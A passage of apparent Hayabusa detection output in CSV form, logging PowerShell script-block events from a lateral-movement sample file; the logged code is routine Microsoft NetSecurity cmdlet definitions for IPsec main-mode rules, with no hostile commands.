$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 